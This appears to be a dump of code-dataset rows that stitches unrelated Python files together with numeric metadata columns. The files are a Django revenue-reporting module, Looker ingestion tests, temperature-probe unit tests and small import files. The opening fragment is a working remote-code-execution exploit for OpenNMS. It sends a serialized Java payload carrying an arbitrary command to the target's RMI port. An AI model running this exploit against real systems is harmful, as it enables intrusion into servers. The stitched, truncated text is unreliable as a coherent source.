x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74'
blob_footer = '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
return blob_header + '\x00' + chr(len(cmd)) + cmd + blob_footer
def exploit(cmd, host):
blob_prologue = '\x4a\x52\x4d\x49\x00\x02\x4b'
packet = build(cmd)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, 1099))
sock.send(blob_prologue)
sock.recv(8192)
sock.send(packet)
sock.close()
def main():
print('OpenNMS Java Object Unserialization RCE implemented by pancho')
if len(sys.argv) != 3:
print('usage: python3 ' + sys.argv[0] + ' host cmd')
return
host = sys.argv[1]
cmd = sys.argv[2]
packet = build(cmd)
exploit(cmd, host)
if __name__ == "__main__":
main()
| 169.357143
| 5,453
| 0.745396
| 1,681
| 7,113
| 3.143367
| 0.136823
| 0.122634
| 0.132854
| 0.124905
| 0.64383
| 0.600114
| 0.582513
| 0.530848
| 0.513248
| 0.455905
| 0
| 0.373604
| 0.017855
| 7,113
| 41
| 5,454
| 173.487805
| 0.382766
| 0.035428
| 0
| 0.076923
| 0
| 0.076923
| 0.916266
| 0.902115
| 0
| 1
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.076923
| 0
| 0.269231
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9608e96ed0779416b27df7c93f4b48c5b758c4e1
| 12,906
|
py
|
Python
|
register/utils.py
|
LucasHiago/pede_ja
|
62609a32d045b167a96be79cc93113d32dcfe917
|
[
"MIT"
] | null | null | null |
register/utils.py
|
LucasHiago/pede_ja
|
62609a32d045b167a96be79cc93113d32dcfe917
|
[
"MIT"
] | null | null | null |
register/utils.py
|
LucasHiago/pede_ja
|
62609a32d045b167a96be79cc93113d32dcfe917
|
[
"MIT"
] | null | null | null |
import datetime
from django.db.models import Sum, Avg
from .models import Bill, Establishment, Order, UserRating, BillPayment
def all_establishments_revenues(current_month, type_filter):
current_month = current_month.replace(day=1)
values = []
if type_filter == 'all_bills':
for iteration in range(6, 0, -1):
value_query = Bill.objects.filter(
opening_date__year=current_month.year,
opening_date__month=current_month.month).count()
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
month_dict['value'] = value_query
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'all_orders':
for iteration in range(6, 0, -1):
value_query = Order.objects.filter(
created_at__year=current_month.year,
created_at__month=current_month.month,
canceled_at__isnull=True).count()
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
month_dict['value'] = value_query
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'payment_online':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
date__year=current_month.year,
date__month=current_month.month,
status_payment=BillPayment.STATUS_AUTHORIZED).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'payment_offline':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
date__year=current_month.year,
date__month=current_month.month,
status_payment=BillPayment.STATUS_OFFLINE_APPROVED).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'evaluation_average':
for iteration in range(6, 0, -1):
value_query = UserRating.objects.filter(
bill__payment_date__year=current_month.year,
bill__payment_date__month=current_month.month).aggregate(
Avg('average'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('average__avg'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('average__avg')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'moip_taxe':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
date__year=current_month.year,
date__month=current_month.month).aggregate(
Sum('moip_fee'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('moip_fee__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('moip_fee__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
else:
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
date__month=current_month.month,
date__year=current_month.year).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
return reversed(values)
def establishment_revenues(current_month, type_filter, establishment):
current_month = current_month.replace(day=1)
values = []
if type_filter == 'all_bills':
for iteration in range(6, 0, -1):
value_query = Bill.objects.filter(
establishment=establishment,
opening_date__year=current_month.year,
opening_date__month=current_month.month).count()
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
month_dict['value'] = value_query
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'all_orders':
for iteration in range(6, 0, -1):
value_query = Order.objects.filter(
bill__establishment=establishment,
created_at__year=current_month.year,
created_at__month=current_month.month,
canceled_at__isnull=True).count()
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
month_dict['value'] = value_query
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'payment_online':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
establishment=establishment,
date__year=current_month.year,
date__month=current_month.month,
status_payment=BillPayment.STATUS_AUTHORIZED).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'payment_offline':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
establishment=establishment,
date__year=current_month.year,
date__month=current_month.month,
status_payment=BillPayment.STATUS_OFFLINE_APPROVED).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'evaluation_average':
for iteration in range(6, 0, -1):
value_query = UserRating.objects.filter(
bill__establishment=establishment,
bill__payment_date__year=current_month.year,
bill__payment_date__month=current_month.month).aggregate(
Avg('average'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('average__avg'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('average__avg')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
elif type_filter == 'moip_taxe':
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
establishment=establishment,
date__year=current_month.year,
date__month=current_month.month).aggregate(
Sum('moip_fee'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('moip_fee__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('moip_fee__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
else:
for iteration in range(6, 0, -1):
value_query = BillPayment.objects.filter(
date__month=current_month.month,
date__year=current_month.year,
establishment=establishment,
status_payment__in=[
BillPayment.STATUS_OFFLINE_APPROVED,
BillPayment.STATUS_AUTHORIZED]).aggregate(
Sum('value'))
month_dict = {}
number_month = str(current_month.month)
month_dict['month'] = number_month
if not value_query.get('value__sum'):
month_dict['value'] = 0
else:
month_dict['value'] = value_query.get('value__sum')
values.append(month_dict)
current_month = current_month - datetime.timedelta(weeks=4)
return reversed(values)
def get_variable_name_filter(type_filter):
if type_filter == 'all_bills':
return 'Total de Contas'
elif type_filter == 'all_orders':
return 'Total de Pedidos'
elif type_filter == 'payment_online':
return 'Pagamento Online'
elif type_filter == 'payment_offline':
return 'Pagamento Offline'
elif type_filter == 'evaluation_average':
return 'Média das Avaliações'
elif type_filter == 'moip_taxe':
return 'Taxa Moip'
else:
return 'Faturamento Total'
def establishments_performance():
establishments = Establishment.objects.all()
list_establishments = []
for establishment in establishments:
payment_online = BillPayment.objects.filter(
establishment=establishment,
status_payment=BillPayment.STATUS_AUTHORIZED).aggregate(
Sum('value')).get('value__sum')
if not payment_online:
payment_online = 0.0
payment_offline = BillPayment.objects.filter(
establishment=establishment,
status_payment=BillPayment.STATUS_OFFLINE_APPROVED).aggregate(
Sum('value')).get('value__sum')
if not payment_offline:
payment_offline = 0.0
evaluation_average = UserRating.objects.filter(
bill__establishment=establishment).aggregate(Avg('average')).get('average__avg')
if not evaluation_average:
evaluation_average = 0.0
moip_taxe = BillPayment.objects.filter(establishment=establishment).aggregate(
Sum('moip_fee')).get('moip_fee__sum')
if not moip_taxe:
moip_taxe = 0.0
all_billing = Bill.objects.filter(establishment=establishment).aggregate(
Sum('value_paid')).get('value_paid__sum')
if not all_billing:
all_billing = 0.0
dict_establishment = {
'name': establishment.name,
'average_bills': establishment.average_bills(),
'noruh_tax_to_super_admin': establishment.noruh_tax_to_super_admin(),
'all_bills': Bill.objects.filter(establishment=establishment).count(),
'all_orders': Order.objects.filter(bill__establishment=establishment).count(),
'payment_online': payment_online,
'payment_offline': payment_offline,
'evaluation_average': evaluation_average,
'moip_taxe': moip_taxe,
'all_billing': all_billing
}
list_establishments.append(dict_establishment)
return list_establishments
| 40.712934
| 92
| 0.596157
| 1,369
| 12,906
| 5.279036
| 0.067202
| 0.126193
| 0.070569
| 0.053134
| 0.849038
| 0.802684
| 0.766847
| 0.766847
| 0.765463
| 0.730179
| 0
| 0.008755
| 0.309701
| 12,906
| 316
| 93
| 40.841772
| 0.802447
| 0
| 0
| 0.809353
| 0
| 0
| 0.079575
| 0.00186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014388
| false
| 0
| 0.010791
| 0
| 0.061151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
961ea0b00e96c9ea7f1b6ae1e4c34ae8061bce96
| 307
|
py
|
Python
|
platform/hwconf_data/efr32bg21/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | null | null | null |
platform/hwconf_data/efr32bg21/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T02:36:22.000Z
|
2020-08-25T02:36:22.000Z
|
platform/hwconf_data/efr32bg21/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T01:56:04.000Z
|
2020-08-25T01:56:04.000Z
|
import efr32bg21.halconfig.halconfig_types as halconfig_types
import efr32bg21.halconfig.halconfig_dependency as halconfig_dependency
import efr32bg21.PythonSnippet.ExporterModel as ExporterModel
import efr32bg21.PythonSnippet.RuntimeModel as RuntimeModel
import efr32bg21.PythonSnippet.Metadata as Metadata
| 61.4
| 71
| 0.905537
| 34
| 307
| 8.058824
| 0.294118
| 0.273723
| 0.306569
| 0.240876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069444
| 0.061889
| 307
| 5
| 72
| 61.4
| 0.881944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8254e0d8f5f1d511b6cefd0303a018151f58c1cd
| 5,099
|
py
|
Python
|
metadata-ingestion/tests/integration/looker/test_looker.py
|
greysond/datahub
|
eb26b2f59d115e4249440a2339b232f2e47166e4
|
[
"Apache-2.0"
] | 1
|
2022-01-19T02:01:31.000Z
|
2022-01-19T02:01:31.000Z
|
metadata-ingestion/tests/integration/looker/test_looker.py
|
zhangheng08/datahub
|
9b81fa428cfa10260b047c6656180f1d90a33978
|
[
"Apache-2.0"
] | 1
|
2021-10-01T13:13:15.000Z
|
2021-10-12T11:51:33.000Z
|
metadata-ingestion/tests/integration/looker/test_looker.py
|
zhangheng08/datahub
|
9b81fa428cfa10260b047c6656180f1d90a33978
|
[
"Apache-2.0"
] | 5
|
2021-07-26T08:37:42.000Z
|
2021-11-16T05:41:02.000Z
|
import time
from datetime import datetime
from unittest import mock
from freezegun import freeze_time
from looker_sdk.sdk.api31.models import Dashboard, DashboardElement, Query
from datahub.ingestion.run.pipeline import Pipeline
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2020-04-14 07:00:00"
@freeze_time(FROZEN_TIME)
def test_looker_ingest(pytestconfig, tmp_path, mock_time):
mocked_client = mock.MagicMock()
with mock.patch(
"datahub.ingestion.source.looker.LookerDashboardSource._get_looker_client",
mocked_client,
):
mocked_client.return_value.all_dashboards.return_value = [Dashboard(id="1")]
mocked_client.return_value.dashboard.return_value = Dashboard(
id="1",
title="foo",
created_at=datetime.utcfromtimestamp(time.time()),
description="lorem ipsum",
dashboard_elements=[
DashboardElement(
id="2",
type="",
subtitle_text="Some text",
query=Query(
model="data",
view="my_view",
dynamic_fields='[{"table_calculation":"calc","label":"foobar","expression":"offset(${my_table.value},1)","value_format":null,"value_format_name":"eur","_kind_hint":"measure","_type_hint":"number"}]',
),
)
],
)
test_resources_dir = pytestconfig.rootpath / "tests/integration/looker"
pipeline = Pipeline.create(
{
"run_id": "looker-test",
"source": {
"type": "looker",
"config": {
"base_url": "https://looker.company.com",
"client_id": "foo",
"client_secret": "bar",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/looker_mces.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "looker_mces.json",
golden_path=test_resources_dir / "expected_output.json",
)
@freeze_time(FROZEN_TIME)
def test_looker_ingest_allow_pattern(pytestconfig, tmp_path, mock_time):
mocked_client = mock.MagicMock()
with mock.patch(
"datahub.ingestion.source.looker.LookerDashboardSource._get_looker_client",
mocked_client,
):
mocked_client.return_value.all_dashboards.return_value = [Dashboard(id="1")]
mocked_client.return_value.dashboard.return_value = Dashboard(
id="1",
title="foo",
created_at=datetime.utcfromtimestamp(time.time()),
description="lorem ipsum",
dashboard_elements=[
DashboardElement(
id="2",
type="",
subtitle_text="Some text",
query=Query(
model="data",
view="my_view",
dynamic_fields='[{"table_calculation":"calc","label":"foobar","expression":"offset(${my_table.value},1)","value_format":null,"value_format_name":"eur","_kind_hint":"measure","_type_hint":"number"}]',
),
),
DashboardElement(
id="10",
type="",
subtitle_text="Some other text",
query=Query(
model="bogus data",
view="my_view",
dynamic_fields='[{"table_calculation":"calc","label":"foobar","expression":"offset(${my_table.value},1)","value_format":null,"value_format_name":"eur","_kind_hint":"measure","_type_hint":"number"}]',
),
),
],
)
test_resources_dir = pytestconfig.rootpath / "tests/integration/looker"
pipeline = Pipeline.create(
{
"run_id": "looker-test",
"source": {
"type": "looker",
"config": {
"base_url": "https://looker.company.com",
"client_id": "foo",
"client_secret": "bar",
"chart_pattern": {"allow": ["2"]},
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/looker_mces.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "looker_mces.json",
golden_path=test_resources_dir / "expected_output.json",
)
| 36.683453
| 223
| 0.496764
| 444
| 5,099
| 5.425676
| 0.256757
| 0.039851
| 0.049813
| 0.03819
| 0.853051
| 0.853051
| 0.853051
| 0.853051
| 0.820672
| 0.820672
| 0
| 0.008866
| 0.380663
| 5,099
| 138
| 224
| 36.949275
| 0.753958
| 0
| 0
| 0.736
| 0
| 0.024
| 0.247303
| 0.154736
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016
| false
| 0
| 0.056
| 0
| 0.072
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d7f8c7a8976deabbbb31e7810388b69f34be709
| 9,795
|
py
|
Python
|
brewerslabng-things/temperature/test/test_TemperatureDS18B20.py
|
allena29/brewerslabng
|
f47e671971436b7af806b54f6019c5b185d7d194
|
[
"Apache-2.0"
] | 1
|
2020-04-12T10:08:10.000Z
|
2020-04-12T10:08:10.000Z
|
brewerslabng-things/temperature/test/test_TemperatureDS18B20.py
|
allena29/brewerslabng
|
f47e671971436b7af806b54f6019c5b185d7d194
|
[
"Apache-2.0"
] | 2
|
2021-12-13T20:09:45.000Z
|
2022-03-08T21:09:57.000Z
|
brewerslabng-things/temperature/test/test_TemperatureDS18B20.py
|
allena29/brewerslabng
|
f47e671971436b7af806b54f6019c5b185d7d194
|
[
"Apache-2.0"
] | null | null | null |
from mock import patch, Mock, call
import unittest
from TemperatureProviderDs18B20 import TemperatureProviderDs18B20
class TestTempProviderDs18B20(unittest.TestCase):
def setUp(self):
self.subject = TemperatureProviderDs18B20('TemperatureDs18B20', 'brewerslab', '/brewhouse/temperature',
open_stored_config=False)
self.subject.log = Mock()
# Add some default data to /brewhouse/temperature/hardware/probes
hardware = self.subject.get_config('/hardware')[0]
self.probe_ferm = hardware.probe.add('fermentation-probe')
probe_other = hardware.probe.add('other-probe')
offset1 = self.probe_ferm.offsets.add('5 10')
offset1.offset = 1.5
offset2 = self.probe_ferm.offsets.add('10 20')
offset2.offset = 2
offset_for_wrong_probe = probe_other.offsets.add('50 70')
offset_for_wrong_probe.offset = 59
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_first_valid_result(self, mockGetProbes, mockReadExternal, mockTime):
self.subject._log = Mock()
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
# For this test we do not want any offset
self.probe_ferm.offsets.delete('5 10')
self.probe_ferm.offsets.delete('10 20')
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 12.4 lastResult 0 (Adjusted by 0)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_many_values_all_valid(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
# Action
for c in range(10):
self.subject.getResult()
# Assert
self.assertEqual(self.subject.log.info.call_count, 10)
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_many_values_with_invalid_values(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
self.probe_ferm.offsets.delete('5 10')
self.probe_ferm.offsets.delete('10 20')
# Action
for c in range(10):
self.subject.getResult()
# These temperatures should be ignored because there were not enough of them
# to believe the external probe.
mockReadExternal.return_value = (16.4, True)
for c in range(3):
self.subject.getResult()
mockReadExternal.return_value = (12.4, True)
for c in range(10):
self.subject.getResult()
# Assert
self.assertEqual(self.subject.log.info.call_count, 23)
self.assertEqual(self.subject.currentTemperatures['fermentation-probe']['temperature'], 12.4)
self.assertEqual(self.subject.currentTemperatures['fermentation-probe']['valid'], True)
self.assertEqual(self.subject.lastResult['fermentation-probe'], 12.4)
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_many_values_with_invalid_values_that_stick(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
self.probe_ferm.offsets.delete('5 10')
self.probe_ferm.offsets.delete('10 20')
# Action
for c in range(10):
self.subject.getResult()
# This result should be believed after we have more than some bad result
mockReadExternal.return_value = (16.4, True)
for c in range(10):
self.subject.getResult()
# This result should be supressed because it deviates too much
mockReadExternal.return_value = (12.39, True)
for c in range(2):
self.subject.getResult()
# Assert
self.assertEqual(self.subject.log.info.call_count, 22)
self.assertEqual(self.subject.currentTemperatures['fermentation-probe']['temperature'], 12.39)
self.assertEqual(self.subject.currentTemperatures['fermentation-probe']['valid'], False)
self.assertEqual(self.subject.lastResult['fermentation-probe'], 16.4)
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_adjustment_made_second_in_list(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
offset3 = self.probe_ferm.offsets.add('30 40')
offset3.offset = 3
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 14.4 lastResult 0 (Adjusted by 2.0)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_adjustment_made_first_in_list(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (5.4, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 6.9 lastResult 0 (Adjusted by 1.5)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_adjustment_made(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (12.4, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 14.4 lastResult 0 (Adjusted by 2.0)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_adjustments_defined_but_not_in_range(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (52.4, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 52.4 lastResult 0 (Adjusted by 0)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_first_reading_at_85(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (85, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('rejecting result fermentation-probe 85 (reason: 85 indicates mis-read)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_reading_at_85_previous_valid_reading(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
self.subject.lastResult['fermentation-probe'] = 84.9
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (85, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 85 lastResult 84.9 (Adjusted by 0)')
@patch('time.sleep')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._read_temperature_from_external_probe')
@patch('TemperatureProviderDs18B20.TemperatureProviderDs18B20._get_probes_to_monitor')
def test_getResult_with_reading_at_85_previous_valid_reading_2(self, mockGetProbes, mockReadExternal, mockTime):
# Setup
self.subject.lastResult['fermentation-probe'] = 85.1
mockGetProbes.return_value = ['fermentation-probe']
mockReadExternal.return_value = (85, True)
# Action
self.subject.getResult()
# Assert
self.subject.log.info.assert_called_once_with('Accepting result 85 lastResult 85.1 (Adjusted by 0)')
| 43.727679
| 127
| 0.717305
| 1,038
| 9,795
| 6.531792
| 0.143545
| 0.061652
| 0.184956
| 0.056637
| 0.833481
| 0.821091
| 0.821091
| 0.800737
| 0.780973
| 0.75885
| 0
| 0.04695
| 0.186728
| 9,795
| 223
| 128
| 43.923767
| 0.804168
| 0.057274
| 0
| 0.613139
| 0
| 0
| 0.313465
| 0.202197
| 0
| 0
| 0
| 0
| 0.124088
| 1
| 0.087591
| false
| 0
| 0.021898
| 0
| 0.116788
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d80fe4ea9fb6b6a6facc703b09340ca43ef1432
| 182
|
py
|
Python
|
pimbaAPP/apps/__init__.py
|
velascoandrs/django-deep-learning-app
|
33f61c02fd4f555e3a4c548fa1e8d8557fdf143f
|
[
"MIT"
] | null | null | null |
pimbaAPP/apps/__init__.py
|
velascoandrs/django-deep-learning-app
|
33f61c02fd4f555e3a4c548fa1e8d8557fdf143f
|
[
"MIT"
] | 6
|
2020-09-26T01:08:20.000Z
|
2022-03-12T00:31:16.000Z
|
pimbaAPP/apps/__init__.py
|
velascoandrs/django-deep-learning-app
|
33f61c02fd4f555e3a4c548fa1e8d8557fdf143f
|
[
"MIT"
] | null | null | null |
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.resnet50 import preprocess_input, decode_predictions
import numpy as np
| 45.5
| 76
| 0.879121
| 24
| 182
| 6.583333
| 0.583333
| 0.170886
| 0.265823
| 0.367089
| 0.443038
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036145
| 0.087912
| 182
| 4
| 77
| 45.5
| 0.915663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d96e4a61ebd09b699853e97cdea658287cf5c91
| 3,649
|
py
|
Python
|
traffic_control/migrations/0039_location_2d_to_3d.py
|
City-of-Helsinki/city-infrastructure-platform
|
c14513a9e54405412085f1047f91ec58b263eac0
|
[
"CC0-1.0"
] | 2
|
2020-11-23T22:08:58.000Z
|
